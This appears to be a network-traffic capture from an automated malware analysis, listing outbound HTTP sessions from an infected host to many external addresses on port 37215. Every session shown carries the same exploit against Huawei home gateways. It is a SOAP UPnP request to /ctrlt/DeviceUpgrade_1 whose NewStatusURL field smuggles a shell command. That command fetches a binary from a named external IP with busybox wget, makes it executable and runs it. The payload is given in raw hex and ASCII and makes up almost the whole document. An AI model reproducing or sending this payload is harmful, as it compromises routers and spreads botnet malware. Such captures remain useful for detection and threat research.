                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              366192.168.2.153632637.127.204.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718132973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              367192.168.2.155256641.155.185.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718153000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              368192.168.2.1541966121.18.122.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718153000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              369192.168.2.155462841.1.80.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718173981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              370192.168.2.154318031.58.201.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718194008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              371192.168.2.1539690197.192.34.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718209982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              372192.168.2.153933241.249.254.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718223095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              373192.168.2.1558024138.135.129.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718265057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              374192.168.2.153615645.79.127.18937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718266010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              375192.168.2.1544968156.82.252.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718266010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
